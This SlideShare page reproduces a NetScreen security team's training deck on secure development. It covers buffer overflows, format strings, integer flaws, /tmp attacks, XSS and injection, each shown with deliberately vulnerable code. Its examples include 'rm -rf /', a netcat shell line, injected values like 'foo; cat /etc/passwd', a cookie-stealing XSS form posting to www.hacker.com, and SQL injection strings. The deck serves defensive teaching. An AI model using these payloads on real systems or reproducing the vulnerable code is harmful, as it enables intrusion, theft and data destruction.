0
Secure Product Development How to avoid being 0wnz0r3d by 31337 h4x04z.
Security Team Introduction <ul><li>Part of service group </li></ul><ul><li>Respond to NetScreen product flaws </li></ul><u...
Why Worry About Security? <ul><li>We sell a  security  product </li></ul><ul><li>Embarrassment </li></ul><ul><li>Loss of r...
Why Security Flaws Exist <ul><li>Security is hard! </li></ul><ul><li>Lack of education </li></ul><ul><li>Lack of priority/...
Designing a Secure Product <ul><li>Security from the beginning </li></ul><ul><li>Clear security requirements </li></ul><ul...
Developing a Secure Product <ul><li>Training/experience </li></ul><ul><li>Think like a hacker </li></ul><ul><li>Never  eve...
Testing a secure Product <ul><li>Allocate time for security testing </li></ul><ul><li>Be mean (breaking things is your job...
Common Flaws - BOFs <ul><li>Buffer overflow </li></ul><ul><li>Most common  serious  flaw </li></ul><ul><li>Mostly problem ...
Buffer Overflows - Cont. <ul><li>Text Segment </li></ul><ul><ul><li>where executable code is stored </li></ul></ul><ul><ul...
Buffer Overflows - Cont. <ul><li>Stack Frame </li></ul><ul><ul><li>Tracks function calls </li></ul></ul><ul><ul><li>Saved ...
Buffer Overflows - Cont. <ul><li>Example of a Stack Buffer Overflow </li></ul><ul><li>void main(int argc, char **argv){ </...
Buffer Overflows - Cont. <ul><li>Use Example: </li></ul><ul><li># ./program “hello” </li></ul>
Buffer Overflows - Cont. <ul><li>Use Example: </li></ul><ul><li># ./program “AAAAAAAAAAAAAAAAAAAAAAAAAAAA” </li></ul><ul><...
Buffer Overflows - Cont. <ul><li>Use Example: </li></ul><ul><li># ./program “AAAAAAAAAAAAAAAAAAAAAAAA0xc0778012” </li></ul...
Buffer Overflows - Cont. <ul><li>What can a h4x0r do now? </li></ul><ul><ul><li>Crash the machine (DoS) </li></ul></ul><ul...
Buffer Overflows - Cont. <ul><li>Heap overflows </li></ul><ul><li>Can modify variable values </li></ul><ul><ul><li>logged_...
Dangerous libc Functions <ul><li>The worst </li></ul><ul><ul><li>strcpy </li></ul></ul><ul><ul><li>strcat </li></ul></ul><...
Format String Flaws <ul><li>Caused by improper use of *printf functions </li></ul><ul><li>printf(str)  instead of  printf(...
Format String Example <ul><li>int main(int argc, char **argv){ </li></ul><ul><li>char str[256]; </li></ul><ul><li>scanf(“%...
Format Strings - Cont. <ul><li>What can a hacker do now? </li></ul><ul><ul><li>Take control of program (overwrite return a...
Format Strings - Cont. <ul><li>Dangerous functions </li></ul><ul><ul><ul><li>fprintf </li></ul></ul></ul><ul><ul><ul><li>p...
Integer Flaws <ul><li>Even integer math can contain flaws </li></ul><ul><li>Sign mistakes </li></ul><ul><li>Integer overfl...
Integer Sign Flaws <ul><li>Relatively common </li></ul><ul><li>Have to check function prototypes </li></ul><ul><li>(unsign...
Integer Sign Flaw - Example <ul><li>void foo(int len, char *src){ </li></ul><ul><li>buf[256]; </li></ul><ul><li>if(len > 2...
Integer Overflows <ul><li>What happens when an int gets too big? </li></ul><ul><li>4,294,967,295 + 1 = 0 </li></ul><ul><li...
Integer Overflow Example <ul><li>int* arraydup(int *array, unsigned int n){ </li></ul><ul><li>int *newarray = malloc( n * ...
Integer Overflow Example(2) <ul><li>char *strcat(char *str1, uint len1, char *str2, uint len2) </li></ul><ul><li>{ </li></...
/tmp Attacks <ul><li>Can happen when filename is predictable </li></ul><ul><li>Attacker can symlink file to anything </li>...
/tmp Attacks - Example <ul><li>void main(){ </li></ul><ul><li>int fd = creat(“/tmp/foo”, O_RDRW); </li></ul><ul><li>write_...
Cross-Site Scripting <ul><li>HTML/javascript attack </li></ul><ul><li>Way to trick  other  users </li></ul><ul><li>Can Occ...
Cross-Site Scripting - Example <ul><li><?php </li></ul><ul><li>print “Welcome $username
”; </li></ul><ul><li>?> </li></ul>...
Command/SQL Injection <ul><li>Can occur whenever commands are executed </li></ul><ul><li>Also in all SQL statements </li><...
Command Injection - Example <ul><li>#!/bin/perl </li></ul><ul><li>#Web-based finger gateway </li></ul><ul><li>$user = $for...
SQL Injection - Example <ul><li>void insert_log(char *user, char *log){ </li></ul><ul><li>db->insert(“insert into log valu...
Summary <ul><li>Plan for security </li></ul><ul><li>Always keep security in mind </li></ul><ul><li>For developers: </li></...
Thank You <ul><li>You’ve just made our job easier. </li></ul>
Upcoming SlideShare
Loading in...5
×

Secure Product Development How to avoid being 0wnz0r3d by ...

951

Published on

0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total Views
951
On Slideshare
0
From Embeds
0
Number of Embeds
0
Actions
Shares
0
Downloads
11
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide

Transcript of "Secure Product Development How to avoid being 0wnz0r3d by ..."

  1. 1. Secure Product Development How to avoid being 0wnz0r3d by 31337 h4x04z.
  2. 2. Security Team Introduction <ul><li>Part of service group </li></ul><ul><li>Respond to NetScreen product flaws </li></ul><ul><li>Audit security of NetScreen products </li></ul><ul><li>Provide security knowledge to R&D </li></ul><ul><li>Create/maintain IDP signatures </li></ul><ul><li>Create/maintain hardened OS images </li></ul>
  3. 3. Why Worry About Security? <ul><li>We sell a security product </li></ul><ul><li>Embarrassment </li></ul><ul><li>Loss of revenue </li></ul><ul><li>Patch releases are inefficient </li></ul><ul><li>Save Security Team work </li></ul>
  4. 4. Why Security Flaws Exist <ul><li>Security is hard! </li></ul><ul><li>Lack of education </li></ul><ul><li>Lack of priority/schedule </li></ul><ul><li>No liability laws (yet) </li></ul><ul><li>C, the cursed language </li></ul>
  5. 5. Designing a Secure Product <ul><li>Security from the beginning </li></ul><ul><li>Clear security requirements </li></ul><ul><li>Multiple layers of security </li></ul><ul><li>Review issues in similar products </li></ul><ul><li>Allow time for security </li></ul>
  6. 6. Developing a Secure Product <ul><li>Training/experience </li></ul><ul><li>Think like a hacker </li></ul><ul><li>Never ever trust input </li></ul><ul><li>Check data obsessively </li></ul><ul><li>Code reviews </li></ul>
  7. 7. Testing a secure Product <ul><li>Allocate time for security testing </li></ul><ul><li>Be mean (breaking things is your job) </li></ul><ul><li>Think like a hacker </li></ul><ul><li>Test for common flaws </li></ul>
  8. 8. Common Flaws - BOFs <ul><li>Buffer overflow </li></ul><ul><li>Most common serious flaw </li></ul><ul><li>Mostly problem in C </li></ul><ul><li>libc functions usually at fault </li></ul>
  9. 9. Buffer Overflows - Cont. <ul><li>Text Segment </li></ul><ul><ul><li>where executable code is stored </li></ul></ul><ul><ul><li>cannot be written to </li></ul></ul><ul><li>Heap </li></ul><ul><ul><li>where malloced memory is located </li></ul></ul><ul><li>Stack </li></ul><ul><ul><li>stores </li></ul></ul><ul><ul><ul><li>local variables </li></ul></ul></ul><ul><ul><ul><li>stack frames </li></ul></ul></ul><ul><ul><li>grows down </li></ul></ul>
  10. 10. Buffer Overflows - Cont. <ul><li>Stack Frame </li></ul><ul><ul><li>Tracks function calls </li></ul></ul><ul><ul><li>Saved Frame Pointer </li></ul></ul><ul><ul><ul><li>points to the FP of the calling function </li></ul></ul></ul><ul><ul><li>Return Address </li></ul></ul><ul><ul><ul><li>contains address of code of calling function </li></ul></ul></ul><ul><ul><ul><li>this is the next line-of-code executed after a return statement </li></ul></ul></ul><ul><ul><li>Local Variables </li></ul></ul>
  11. 11. Buffer Overflows - Cont. <ul><li>Example of a Stack Buffer Overflow </li></ul><ul><li>void main(int argc, char **argv){ </li></ul><ul><li>foo(argv[1]); </li></ul><ul><li>} </li></ul><ul><li>void foo(char *str){ </li></ul><ul><li>int a; </li></ul><ul><li>char c[16]; </li></ul><ul><li>strcpy(c, str); </li></ul><ul><li>return; </li></ul><ul><li>} </li></ul>
  12. 12. Buffer Overflows - Cont. <ul><li>Use Example: </li></ul><ul><li># ./program “hello” </li></ul>
  13. 13. Buffer Overflows - Cont. <ul><li>Use Example: </li></ul><ul><li># ./program “AAAAAAAAAAAAAAAAAAAAAAAAAAAA” </li></ul><ul><li>(that’s 28 As) </li></ul><ul><li>Return Address is now “AAAA” or 0x41414141! </li></ul>
  14. 14. Buffer Overflows - Cont. <ul><li>Use Example: </li></ul><ul><li># ./program “AAAAAAAAAAAAAAAAAAAAAAAA0xc0778012” </li></ul><ul><li>Return Address is now 0xc0778012 </li></ul><ul><li>on function return, program starts executing c[0] </li></ul><ul><li>Since we control what goes in c[], we now control the program! </li></ul>
  15. 15. Buffer Overflows - Cont. <ul><li>What can a h4x0r do now? </li></ul><ul><ul><li>Crash the machine (DoS) </li></ul></ul><ul><ul><li>Destroy data (rm -rf /) </li></ul></ul><ul><ul><li>Install a trojan (subseven, backorifice) </li></ul></ul><ul><ul><li>Spawn a shell (nc -l -p 5000 | sh) </li></ul></ul><ul><li>On a NetScreen? </li></ul><ul><ul><li>DoS (crash) most common result </li></ul></ul><ul><ul><li>Overwrite the policy with garbage? </li></ul></ul><ul><ul><li>Modify the policy to allow access? </li></ul></ul><ul><ul><li>Execute arbitrary ScreenOS commands? </li></ul></ul>
  16. 16. Buffer Overflows - Cont. <ul><li>Heap overflows </li></ul><ul><li>Can modify variable values </li></ul><ul><ul><li>logged_in = 1 </li></ul></ul><ul><ul><li>is_superuser = 1 </li></ul></ul><ul><li>Code execution </li></ul><ul><ul><li>Harder than stack overflows </li></ul></ul><ul><ul><li>Only works on some systems </li></ul></ul><ul><ul><li>Overwrites malloc headers </li></ul></ul><ul><ul><li>This is a very complex attack </li></ul></ul>
  17. 17. Dangerous libc Functions <ul><li>The worst </li></ul><ul><ul><li>strcpy </li></ul></ul><ul><ul><li>strcat </li></ul></ul><ul><ul><li>sprintf, vsprintf </li></ul></ul><ul><ul><li>gets </li></ul></ul><ul><ul><li>strlen </li></ul></ul><ul><ul><li>scanf, sscanf, fscanf, vscanf, vsscanf </li></ul></ul><ul><li>Some others </li></ul><ul><ul><li>realpath </li></ul></ul><ul><ul><li>getopt </li></ul></ul><ul><ul><li>getpass </li></ul></ul><ul><ul><li>streadd </li></ul></ul><ul><ul><li>strecpy </li></ul></ul><ul><ul><li>strtms </li></ul></ul><ul><ul><li>getwd </li></ul></ul>
  18. 18. Format String Flaws <ul><li>Caused by improper use of *printf functions </li></ul><ul><li>printf(str) instead of printf(“%s”, str) </li></ul><ul><li>%n argument writes to stack </li></ul><ul><li>Use field widths to increase value (e.g. %100d) </li></ul><ul><li>Use multiple %n (one for each byte) </li></ul>
  19. 19. Format String Example <ul><li>int main(int argc, char **argv){ </li></ul><ul><li>char str[256]; </li></ul><ul><li>scanf(“%256s”, str); //look ma, no overflow! </li></ul><ul><li>printf(str); </li></ul><ul><li>} </li></ul><ul><li># ./program </li></ul><ul><li>AAAA%08x%08x%08x%08x%08x%n </li></ul><ul><li>We’ve overwritten memory @ 0x41414141. Replace AAAA with your return address, or any other data structure location </li></ul>
  20. 20. Format Strings - Cont. <ul><li>What can a hacker do now? </li></ul><ul><ul><li>Take control of program (overwrite return address) </li></ul></ul><ul><ul><li>Dump memory using %s or %x </li></ul></ul><ul><ul><li>Modify arbitrary data structures </li></ul></ul><ul><ul><ul><li>logged_in = 1 </li></ul></ul></ul><ul><ul><li>Crash the program (write to bogus address, SEGFAULT) </li></ul></ul>
  21. 21. Format Strings - Cont. <ul><li>Dangerous functions </li></ul><ul><ul><ul><li>fprintf </li></ul></ul></ul><ul><ul><ul><li>printf </li></ul></ul></ul><ul><ul><ul><li>sprintf </li></ul></ul></ul><ul><ul><ul><li>snprintf </li></ul></ul></ul><ul><ul><ul><li>vfprintf </li></ul></ul></ul><ul><ul><ul><li>vsprintf </li></ul></ul></ul><ul><ul><ul><li>vsnprintf </li></ul></ul></ul><ul><ul><ul><li>syslog </li></ul></ul></ul><ul><ul><ul><li>others (err*, verr*, warn*, vwarn*) </li></ul></ul></ul><ul><ul><ul><li>your own logging functions </li></ul></ul></ul>
  22. 22. Integer Flaws <ul><li>Even integer math can contain flaws </li></ul><ul><li>Sign mistakes </li></ul><ul><li>Integer overflows </li></ul>
  23. 23. Integer Sign Flaws <ul><li>Relatively common </li></ul><ul><li>Have to check function prototypes </li></ul><ul><li>(unsigned int)-1 = 4,294,967,295 </li></ul><ul><li>Hard to exploit </li></ul><ul><li>Apache chunked encoding vulnerability </li></ul>
  24. 24. Integer Sign Flaw - Example <ul><li>void foo(int len, char *src){ </li></ul><ul><li>buf[256]; </li></ul><ul><li>if(len > 256) { //no overflows allowed! </li></ul><ul><li>printf(“error!”); </li></ul><ul><li>return; </li></ul><ul><li>} </li></ul><ul><li>memcpy(buf, src, len); </li></ul><ul><li>printf(“ok!”); </li></ul><ul><li>} </li></ul><ul><li>foo(7, “hello”); -- ok! </li></ul><ul><li>foo(500, ...); -- error! </li></ul><ul><li>foo(-1, ...); -- SEGFAULT </li></ul>
  25. 25. Integer Overflows <ul><li>What happens when an int gets too big? </li></ul><ul><li>4,294,967,295 + 1 = 0 </li></ul><ul><li>All integer math is mod 2^32 </li></ul><ul><li>No way to tell this has happened </li></ul>
  26. 26. Integer Overflow Example <ul><li>int* arraydup(int *array, unsigned int n){ </li></ul><ul><li>int *newarray = malloc( n * sizeof(int) ); </li></ul><ul><li>int i; </li></ul><ul><li>for(i = 0; i < n ; i++){ </li></ul><ul><li>newarray[i] = array[i]; </li></ul><ul><li>} </li></ul><ul><li>return newarray; </li></ul><ul><li>} </li></ul><ul><li>if n = 1073741824, n * sizeof(int) = 4294967296 = 0 </li></ul>
  27. 27. Integer Overflow Example(2) <ul><li>char *strcat(char *str1, uint len1, char *str2, uint len2) </li></ul><ul><li>{ </li></ul><ul><li>char *newstr = malloc( len1 + len2 ); </li></ul><ul><li>memcpy(newstr, str1, len1 ); </li></ul><ul><li>memcpy(newstr + len1 , str2, len2 ); </li></ul><ul><li>return newstr; </li></ul><ul><li>} </li></ul><ul><li>if len1 = len2 = 0x80000000, len1 + len2 = 0x0100000000 = 0 </li></ul><ul><li>result: SEGFAULT </li></ul>
  28. 28. /tmp Attacks <ul><li>Can happen when filename is predictable </li></ul><ul><li>Attacker can symlink file to anything </li></ul><ul><li>Not just /tmp </li></ul><ul><li>Solution: use tempnam, etc. </li></ul>
  29. 29. /tmp Attacks - Example <ul><li>void main(){ </li></ul><ul><li>int fd = creat(“/tmp/foo”, O_RDRW); </li></ul><ul><li>write_temp_data(fd); </li></ul><ul><li>} </li></ul><ul><li>Attacker can symlink /tmp/foo to some other file owned by the process UID. You’re not root are you? </li></ul><ul><li>/etc/passwd </li></ul><ul><li>/var/firewall/policy.txt </li></ul><ul><li>if attacker can control what is written, could be even worse attack </li></ul>
  30. 30. Cross-Site Scripting <ul><li>HTML/javascript attack </li></ul><ul><li>Way to trick other users </li></ul><ul><li>Can Occur whenever user-provided data is displayed (NetScreen FW Logs) </li></ul><ul><li>Very difficult to block, script can be entered many ways </li></ul><ul><li>Only allow good characters, don’t try to block bad </li></ul>
  31. 31. Cross-Site Scripting - Example <ul><li><?php </li></ul><ul><li>print “Welcome $username ”; </li></ul><ul><li>?> </li></ul><ul><li>What if username was: </li></ul><ul><li><form action=www.hacker.com/gather.cgi><input type=hidden name=cookie onLoad=“value=document.cookie; form.submit();”></form>victim </li></ul><ul><li>Victim would see “Welcome victim!” but their cookie was just stolen. </li></ul><ul><li>Can be made less conspicuous by using URL encodings, e.g.: </li></ul><ul><li>/login.php?username=<form... </li></ul><ul><li>can look like: </li></ul><ul><li>/login.php?%75%73%65%72%6e%61%6d%65%3d%3c%66%6f%72%6d... </li></ul>
  32. 32. Command/SQL Injection <ul><li>Can occur whenever commands are executed </li></ul><ul><li>Also in all SQL statements </li></ul><ul><li>Prematurely end statement, add 2nd statement </li></ul><ul><li>Don’t filter out bad characters, only allow good characters </li></ul>
  33. 33. Command Injection - Example <ul><li>#!/bin/perl </li></ul><ul><li>#Web-based finger gateway </li></ul><ul><li>$user = $form[user]; </li></ul><ul><li>@output = `/bin/finger $user`; </li></ul><ul><li>print @output; </li></ul><ul><li>What if $form[user] was “foo; rm -rf /” or “foo; cat /etc/passwd”? </li></ul><ul><li>The ‘;’ terminates the 1st command, begins 2nd command. </li></ul><ul><li>Not only ‘;’, some shells allow &&, ||, etc. </li></ul>
  34. 34. SQL Injection - Example <ul><li>void insert_log(char *user, char *log){ </li></ul><ul><li>db->insert(“insert into log values(%s, %s)”, user, log); </li></ul><ul><li>} </li></ul><ul><li>What if log was: “executed command: foo); truncate table log;” </li></ul><ul><li>(presumably the attacker typed “foo); truncate table log;” at the prompt </li></ul><ul><li>or this: “update userdb set password=$passwd where user=$user;” </li></ul><ul><li>What if $user was “attacker or user like ‘admin’” </li></ul><ul><li>The attacker just set the admin’s password! </li></ul>
  35. 35. Summary <ul><li>Plan for security </li></ul><ul><li>Always keep security in mind </li></ul><ul><li>For developers: </li></ul><ul><ul><li>Never trust input </li></ul></ul><ul><ul><li>Check everything </li></ul></ul><ul><ul><li>Only allow valid data </li></ul></ul><ul><ul><li>Be familiar with common security flaws </li></ul></ul>
  36. 36. Thank You <ul><li>You’ve just made our job easier. </li></ul>
  1. A particular slide catching your eye?

    Clipping is a handy way to collect important slides you want to go back to later.

×